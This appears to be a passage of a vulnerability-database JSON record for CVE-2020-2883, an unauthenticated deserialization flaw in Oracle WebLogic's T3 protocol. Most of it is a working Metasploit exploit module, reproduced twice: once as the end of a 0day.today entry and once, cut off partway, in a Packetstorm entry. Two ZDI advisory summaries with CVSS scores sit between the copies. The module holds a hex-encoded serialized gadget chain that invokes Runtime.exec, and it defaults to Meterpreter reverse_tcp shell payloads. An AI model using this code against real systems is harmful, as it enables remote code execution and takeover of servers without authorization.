detect WebLogic') unless version\n\n @version_no = Gem::Version.new(version)\n print_status(\"WebLogic 
version detected: #{@version_no}\")\n\n return CheckCode::Appears if versions.include?(@version_no)\n\n CheckCode::Detected('Version of WebLogic is not vulnerable')\n ensure\n disconnect\n end\n\n def exploit\n super\n\n connect\n print_status('Sending handshake...')\n t3_handshake\n\n if target.name == 'Windows'\n win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })\n win_obj.prepend('cmd.exe /c ')\n win_obj = build_payload_obj(win_obj)\n t3_send(win_obj)\n else\n execute_cmdstager\n end\n ensure\n disconnect\n end\n\n def t3_handshake\n # t3 12.2.1\\nAS:255\n # \\nHL:19\\nMS:100000\n # 00\\n\\n\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_payload_obj(payload_data)\n payload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n payload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23\n payload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue\n payload_obj << '94da30b4fb3f82b1' # SerialVersionUID\n payload_obj << '030002' # 2 fields\n payload_obj << '490004' # Integer, field name length: 4\n payload_obj << '73697a65' # size\n payload_obj << '4c000a' # Object, field name length: 10\n payload_obj << '636f6d70617261746f72' # comparator\n payload_obj << '740016' # String, field name length: 22\n payload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator;\n payload_obj << '7870'\n payload_obj << '00000002'\n payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n payload_obj << '0030' # Class name length: 48\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator\n payload_obj << '6d70617261746f722e457874726163746f72436f'\n payload_obj << '6d70617261746f72'\n payload_obj << extractor_comp_uid # SerialVersionUID\n payload_obj << '020001' # Serializable, 1 
field\n payload_obj << '4c000b' # Object, field name length: 11\n payload_obj << '6d5f657874726163746f72' # m_extractor\n payload_obj << '740022'\n payload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor;\n payload_obj << '616c7565457874726163746f723b'\n payload_obj << '7870'\n payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n payload_obj << '002c' # Class name length: 44\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor\n payload_obj << '74726163746f722e436861696e65644578747261'\n payload_obj << '63746f72'\n payload_obj << chained_extractor_uid # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n payload_obj << '0036' # Class name length: 54\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor\n payload_obj << '74726163746f722e4162737472616374436f6d70'\n payload_obj << '6f73697465457874726163746f72'\n payload_obj << '086b3d8c05690f44' # SerialVersionUID\n payload_obj << '020001' # Serializable, 1 field\n payload_obj << '5b000c' # array, length: 12\n payload_obj << '6d5f61457874726163746f72' # m_aExtractor\n payload_obj << '740023' # String, length: 35\n payload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor;\n payload_obj << '56616c7565457874726163746f723b'\n payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n payload_obj << '002d' # Class name length: 45\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor\n payload_obj << '74726163746f722e416273747261637445787472'\n payload_obj << '6163746f72'\n payload_obj << abstract_extractor_uid # SerialVersionUID\n payload_obj << '020001' # Serializable, 1 field\n payload_obj << '490009' # Integer, field name length: 9\n payload_obj << '6d5f6e546172676574' # m_nTarget\n payload_obj << '7870'\n payload_obj << '00000000'\n 
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC\n payload_obj << '0023' # Class name length: 35\n payload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor;\n payload_obj << '56616c7565457874726163746f723b'\n payload_obj << '2246204735c4a0fe' # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7870'\n payload_obj << '00000003'\n payload_obj << '7372'\n payload_obj << '002f' # Class name length: 47\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor\n payload_obj << '74726163746f722e5265666c656374696f6e4578'\n payload_obj << '74726163746f72'\n payload_obj << reflection_extractor_uid # SerialVersionUID\n payload_obj << '02000' # Serializable\n payload_obj << reflect_extract_count\n payload_obj << '5b0009' # array, length: 9\n payload_obj << '6d5f616f506172616d' # m_aoParam\n payload_obj << '740013' # String, length: 19\n payload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object;\n payload_obj << add_sect\n payload_obj << '4c0009' # Object, length: 9\n payload_obj << '6d5f734d6574686f64' # m_sMethod\n payload_obj << '740012' # String, length: 18\n payload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;\n payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE\n payload_obj << '007e0009' # handle\n payload_obj << '00000000'\n payload_obj << '7572'\n payload_obj << '0013' # Class name length: 19\n payload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object;\n payload_obj << '90ce589f1073296c' # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7870'\n payload_obj << '00000002'\n payload_obj << '74000a' # String, length: 10\n payload_obj << '67657452756e74696d65' # getRuntime\n payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC\n payload_obj << '0012' # Class name length: 18\n payload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class;\n payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID\n 
payload_obj << '020000' # Serializable, no fields\n payload_obj << '7870'\n payload_obj << '00000000'\n payload_obj << add_tc_null\n payload_obj << '740009' # String, length: 9\n payload_obj << '6765744d6574686f64' # getMethod\n payload_obj << '7371'\n payload_obj << '007e000d' # handle\n payload_obj << '00000000'\n payload_obj << '7571'\n payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle\n payload_obj << '00000002'\n payload_obj << '707571'\n payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle\n payload_obj << '00000000'\n payload_obj << add_tc_null\n payload_obj << '740006' # String, length: 6\n payload_obj << '696e766f6b65' # invoke\n payload_obj << '7371'\n payload_obj << '007e000d' # handle\n payload_obj << '00000000'\n payload_obj << '7571'\n payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle\n payload_obj << '00000001'\n payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC\n payload_obj << '0013' # Class name length: 19\n payload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String;\n payload_obj << 'add256e7e91d7b47' # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7870'\n payload_obj << '00000003'\n\n payload_bin = format_payload(payload_data)\n payload_obj << payload_bin\n\n payload_obj << add_tc_null\n payload_obj << '740004'\n payload_obj << '65786563' # exec\n payload_obj << '7704'\n payload_obj << '00000003'\n payload_obj << '76720011'\n payload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime\n payload_obj << '0000000000000000000000'\n payload_obj << '7870'\n payload_obj << '740001'\n payload_obj << '3178'\n end\n\n def extractor_comp_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n 'c7ad6d3a676f3c18'\n when Gem::Version.new('12.2.1.3.0')\n 'fb4ac83df1d72edc'\n else\n 'f9b3bc58cc52cd21'\n end\n end\n\n def change_handle?\n @version_no == Gem::Version.new('12.2.1.3.0')\n end\n\n def chained_extractor_uid\n case @version_no\n when 
Gem::Version.new('12.1.3.0.0')\n '889f81b0945d5b7f'\n when Gem::Version.new('12.2.1.3.0')\n '06ee10433a4cc4b4'\n else\n '435b250b72f63db5'\n end\n end\n\n def abstract_extractor_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n '658195303e723821'\n when Gem::Version.new('12.2.1.3.0')\n '752289ad4d460138'\n else\n '9b1be18ed70100e5'\n end\n end\n\n def reflection_extractor_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n 'ee7ae995c02fb4a2'\n when Gem::Version.new('12.2.1.3.0')\n '87973791b26429dd'\n else\n '1f62f564b951b614'\n end\n end\n\n def reflect_extract_count\n case @version_no\n when Gem::Version.new('12.2.1.3.0')\n '3'\n else\n '2'\n end\n end\n\n def add_sect\n sect = ''\n\n if @version_no == Gem::Version.new('12.2.1.3.0')\n sect << '4c0011' # Object, length: 17\n sect << '6d5f657874726163746f' # m_extractorCached\n sect << '72436163686564'\n sect << '740012'\n sect << '4c6a6176612f6c616e67' # Ljava/lang/Object;\n sect << '2f4f626a6563743b'\n end\n\n sect\n end\n\n def add_tc_null\n return '70' if @version_no == Gem::Version.new('12.2.1.3.0')\n\n ''\n end\n\n def t3_send(payload_obj)\n print_status('Sending object...')\n\n request_obj = '000009f3' # Original packet length\n request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags\n request_obj << 'ffffffffffffffff'\n request_obj << '00000071'\n request_obj << '0000ea60'\n request_obj << '00000018432ec6'\n request_obj << 'a2a63985b5af7d63e643'\n request_obj << '83f42a6d92c9e9af0f94'\n request_obj << '72027973720078720178'\n request_obj << '720278700000000c0000'\n request_obj << '00020000000000000000'\n request_obj << '00000001007070707070'\n request_obj << '700000000c0000000200'\n request_obj << '00000000000000000000'\n request_obj << '01007006'\n request_obj << 'fe010000' # separator\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '001d' # Class name length: 29\n request_obj << '7765626c6f6769632e72' # 
weblogic.rjvm.ClassTableEntry\n request_obj << '6a766d2e436c61737354'\n request_obj << '61626c65456e747279'\n request_obj << '2f52658157f4f9ed' # SerialVersionUID\n request_obj << '0c0000' # flags?\n request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC\n request_obj << '0024' # Class name length: 36\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5061636b61'\n request_obj << '6765496e666f'\n request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID\n request_obj << '020009' # Serializable, 9 fields\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d616a6f72' # major\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d696e6f72' # minor\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '70617463685570646174' # patchUpdate\n request_obj << '65'\n request_obj << '49000c' # Field type: Int, field name length: 12\n request_obj << '726f6c6c696e67506174' # rollingPatch\n request_obj << '6368'\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '73657276696365506163' # servicePack\n request_obj << '6b'\n request_obj << '5a000e' # Field type: Z = Bool, field name length: 14\n request_obj << '74656d706f7261727950' # temporaryPatch\n request_obj << '61746368'\n request_obj << '4c0009' # Field type: Object, field name length: 9\n request_obj << '696d706c5469746c65' # implTitle\n request_obj << '740012' # String, length: 18\n request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;\n request_obj << '2f537472696e673b'\n request_obj << '4c000a' # Field type: Object, field name length: 10\n request_obj << '696d706c56656e646f72' # implVendor\n request_obj << '71007e0003' # TC_REFERENCE, handle\n request_obj << '4c000b' # Field type: Object, field name length: 11\n request_obj << '696d706c56657273696f6e' # implVersion\n request_obj << 
'71007e0003' # TC_REFERENCE, handle\n request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL\n request_obj << '7702' # TC_ENDBLOCKDATA\n request_obj << '000078'\n request_obj << 'fe010000' # separator\n\n request_obj << payload_obj\n\n request_obj << 'fe010000' # separator\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '001d' # Class name length: 29\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry\n request_obj << '6a766d2e436c61737354'\n request_obj << '61626c65456e747279'\n request_obj << '2f52658157f4f9ed' # SerialVersionUID\n request_obj << '0c0000'\n request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC\n request_obj << '0021' # Class name length: 33\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5065657249'\n request_obj << '6e666f'\n request_obj << '585474f39bc908f1' # SerialVersionUID\n request_obj << '020007' # Serializable, 7 fields\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d616a6f72' # major\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d696e6f72' # minor\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '70617463685570646174' # patchUpdate\n request_obj << '65'\n request_obj << '49000c' # Field type: Int, field name length: 12\n request_obj << '726f6c6c696e67506174' # rollingPatch\n request_obj << '6368'\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '73657276696365506163' # servicePack\n request_obj << '6b'\n request_obj << '5a000e' # Field type: Z = Bool, field name length: 14\n request_obj << '74656d706f7261727950' # temporaryPatch\n request_obj << '61746368'\n request_obj << '5b0008' # Field type: Array, field name length: 8\n request_obj << '7061636b61676573' # packages\n request_obj << '740027' # 
String, length: 39\n request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;\n request_obj << '2f636f6d6d6f6e2f696e'\n request_obj << '7465726e616c2f506163'\n request_obj << '6b616765496e666f3b'\n request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n request_obj << '0024' # Class name length: 36\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5665727369'\n request_obj << '6f6e496e666f'\n request_obj << '972245516452463e' # SerialVersionUID\n request_obj << '020003' # Serializable, 3 fields\n request_obj << '5b0008' # Field type: Array, field name length: 8\n request_obj << '7061636b61676573' # packages\n request_obj << '71007e0003' # TC_REFERENCE, handle\n request_obj << '4c000e' # Field type: Object, field name length: 14\n request_obj << '72656c65617365566572' # releaseVersion\n request_obj << '73696f6e'\n request_obj << '740012' # String, length: 18\n request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;\n request_obj << '2f537472696e673b'\n request_obj << '5b0012' # Field type: Array, field name length: 18\n request_obj << '76657273696f6e496e66' # versionInfoAsBytes\n request_obj << '6f41734279746573'\n request_obj << '740002' # String, length: 2\n request_obj << '5b42' # [B\n request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n request_obj << '0024' # Class name length: 36\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5061636b61'\n request_obj << '6765496e666f'\n request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID\n request_obj << '020009' # Serializable, 9 fields\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d616a6f72' # major\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d696e6f72' # minor\n request_obj << '49000b' # Field type: Int, field name 
length: 11\n request_obj << '70617463685570646174' # patchUpdate\n request_obj << '65'\n request_obj << '49000c' # Field type: Int, field name length: 12\n request_obj << '726f6c6c696e67506174' # rollingPatch\n request_obj << '6368'\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '73657276696365506163' # servicePack\n request_obj << '6b'\n request_obj << '5a000e' # Field type: Z = Bool, field name length: 14\n request_obj << '74656d706f7261727950' # temporaryPatch\n request_obj << '61746368'\n request_obj << '4c0009' # Field type: Object, field name length: 9\n request_obj << '696d706c5469746c65' # implTitle\n request_obj << '71007e0005' # TC_REFERENCE, handle\n request_obj << '4c000a' # Field type: Object, field name length: 10\n request_obj << '696d706c56656e646f72' # implVendor\n request_obj << '71007e0005' # TC_REFERENCE, handle\n request_obj << '4c000b' # Field type: Object, field name length: 11\n request_obj << '696d706c56657273696f' # implVersion\n request_obj << '6e'\n request_obj << '71007e0005' # TC_REFERENCE, handle\n request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL\n request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA\n request_obj << 'fe00ff' # separator\n request_obj << 'fe010000'\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '0013' # Class name length: 19\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID\n request_obj << '6a766d2e4a564d4944'\n request_obj << 'dc49c23ede121e2a' # SerialVersionUID\n request_obj << '0c0000'\n request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA\n request_obj << '4621'\n request_obj << '000000000000000000'\n request_obj << '09' # length: 9\n request_obj << '3132372e302e312e31' # 127.0.1.1\n request_obj << '000b' # length: 11\n request_obj << '75732d6c2d627265656e' # us-l-breens\n request_obj << '73'\n request_obj << 'a53caff10000000700'\n request_obj << '001b59'\n 
request_obj << 'ffffffffffffffffffff'\n request_obj << 'ffffffffffffffffffff'\n request_obj << 'ffffffff'\n request_obj << '0078'\n request_obj << 'fe010000' # separator\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '0013' # Class name length: 19\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID\n request_obj << '6a766d2e4a564d4944'\n request_obj << 'dc49c23ede121e2a' # SerialVersionUID\n request_obj << '0c0000'\n request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA\n request_obj << '1d0181401281'\n request_obj << '34bf427600093132372e'\n request_obj << '302e312e31a53caff1'\n request_obj << '000000000078'\n\n new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')\n request_obj[0, 8] = new_len\n\n sock.put([request_obj].pack('H*'))\n sleep(1)\n end\n\n def format_payload(payload_cmd)\n print_status('Formatting payload...')\n payload_arr = payload_cmd.split(' ', 3)\n\n formatted_payload = ''\n payload_arr.each do |part|\n formatted_payload << '74' # denotes a string\n formatted_payload << part.length.to_s(16).rjust(4, '0')\n formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n formatted_payload\n end\n\n def execute_command(cmd, _opts = {})\n cmd.prepend('/bin/sh -c ')\n cmd = build_payload_obj(cmd)\n\n t3_send(cmd)\n end\nend\n", "sourceHref": "https://0day.today/exploit/34538", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T22:06:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Oracle WebLogic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the T3 protocol. Crafted data in a T3 protocol message can trigger the deserialization of untrusted data. 
An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-16T00:00:00", "type": "zdi", "title": "Oracle WebLogic Server T3 Protocol Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-04-16T00:00:00", "id": "ZDI-20-504", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-504/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T22:05:58", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Oracle WebLogic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Oracle Coherence library. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. 
An attacker can leverage this vulnerability to execute code in the context of the service account.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "zdi", "title": "Oracle WebLogic Server T3 Protocol Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-04-30T00:00:00", "id": "ZDI-20-570", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-570/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-06-05T00:59:02", "description": "", "cvss3": {}, "published": "2020-06-04T00:00:00", "type": "packetstorm", "title": "WebLogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-2883"], "modified": "2020-06-04T00:00:00", "id": "PACKETSTORM:157950", "href": "https://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current 
source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp', \n'Description' => %q{ \nThere exists a Java object deserialization vulnerability \nin multiple versions of WebLogic. \n \nUnauthenticated remote code execution can be achieved by \nsending a serialized `BadAttributeValueExpException` \nobject over the T3 protocol to vulnerable versions of \nWebLogic. Leveraging an `ExtractorComparator` enables \nthe ability to trigger `method.invoke()`, which will \nexecute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Quynh Le', # Vulnerability Discovery \n'Y4er', # PoC \n'Shelby Pace' # Metasploit Module \n], \n'References' => \n[ \n[ 'CVE', '2020-2883' ], \n[ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ], \n], \n'Platform' => %w[unix linux win], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Privileged' => false, \n'Targets' => \n[ \n[ \n'Windows', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Unix', \n{ \n'Platform' => %w[unix linux], \n'CmdStagerFlavor' => 'printf', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n], \n], \n'DisclosureDate' => '2020-04-30', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ Opt::RPORT(7001) ]) \nend \n \ndef check \nconnect \n \nweb_req = \"GET /console/login/LoginForm.jsp HTTP/1.1\\nHost: #{peer}\\n\\n\" \nsock.put(web_req) \nsleep(2) \nres = sock.get_once \n \nversions = \n[ 
\nGem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), \nGem::Version.new('12.2.1.4.0') \n] \n \nreturn CheckCode::Unknown('Failed to obtain response from service') unless res \n \n/WebLogic\\s+Server\\s+Version:\\s+(?<version>\\d+\\.\\d+\\.\\d+\\.*\\d*\\.*\\d*)/ =~ res \nreturn CheckCode::Unknown('Failed to detect WebLogic') unless version \n \n@version_no = Gem::Version.new(version) \nprint_status(\"WebLogic version detected: #{@version_no}\") \n \nreturn CheckCode::Appears if versions.include?(@version_no) \n \nCheckCode::Detected('Version of WebLogic is not vulnerable') \nensure \ndisconnect \nend \n \ndef exploit \nsuper \n \nconnect \nprint_status('Sending handshake...') \nt3_handshake \n \nif target.name == 'Windows' \nwin_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true }) \nwin_obj.prepend('cmd.exe /c ') \nwin_obj = build_payload_obj(win_obj) \nt3_send(win_obj) \nelse \nexecute_cmdstager \nend \nensure \ndisconnect \nend \n \ndef t3_handshake \n# t3 12.2.1\\nAS:255 \n# \\nHL:19\\nMS:100000 \n# 00\\n\\n \nshake = '74332031322e322e310a41533a323535' \nshake << '0a484c3a31390a4d533a313030303030' \nshake << '30300a0a' \n \nsock.put([shake].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef build_payload_obj(payload_data) \npayload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION \npayload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23 \npayload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue \npayload_obj << '94da30b4fb3f82b1' # SerialVersionUID \npayload_obj << '030002' # 2 fields \npayload_obj << '490004' # Integer, field name length: 4 \npayload_obj << '73697a65' # size \npayload_obj << '4c000a' # Object, field name length: 10 \npayload_obj << '636f6d70617261746f72' # comparator \npayload_obj << '740016' # String, field name length: 22 \npayload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator; \npayload_obj << '7870' 
\npayload_obj << '00000002' \npayload_obj << '7372' # TC_OBJECT, TC_CLASSDESC \npayload_obj << '0030' # Class name length: 48 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator \npayload_obj << '6d70617261746f722e457874726163746f72436f' \npayload_obj << '6d70617261746f72' \npayload_obj << extractor_comp_uid # SerialVersionUID \npayload_obj << '020001' # Serializable, 1 field \npayload_obj << '4c000b' # Object, field name length: 11 \npayload_obj << '6d5f657874726163746f72' # m_extractor \npayload_obj << '740022' \npayload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor; \npayload_obj << '616c7565457874726163746f723b' \npayload_obj << '7870' \npayload_obj << '7372' # TC_OBJECT, TC_CLASSDESC \npayload_obj << '002c' # Class name length: 44 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor \npayload_obj << '74726163746f722e436861696e65644578747261' \npayload_obj << '63746f72' \npayload_obj << chained_extractor_uid # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \npayload_obj << '0036' # Class name length: 54 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor \npayload_obj << '74726163746f722e4162737472616374436f6d70' \npayload_obj << '6f73697465457874726163746f72' \npayload_obj << '086b3d8c05690f44' # SerialVersionUID \npayload_obj << '020001' # Serializable, 1 field \npayload_obj << '5b000c' # array, length: 12 \npayload_obj << '6d5f61457874726163746f72' # m_aExtractor \npayload_obj << '740023' # String, length: 35 \npayload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor; \npayload_obj << '56616c7565457874726163746f723b' \npayload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \npayload_obj << '002d' # Class name length: 45 \npayload_obj << 
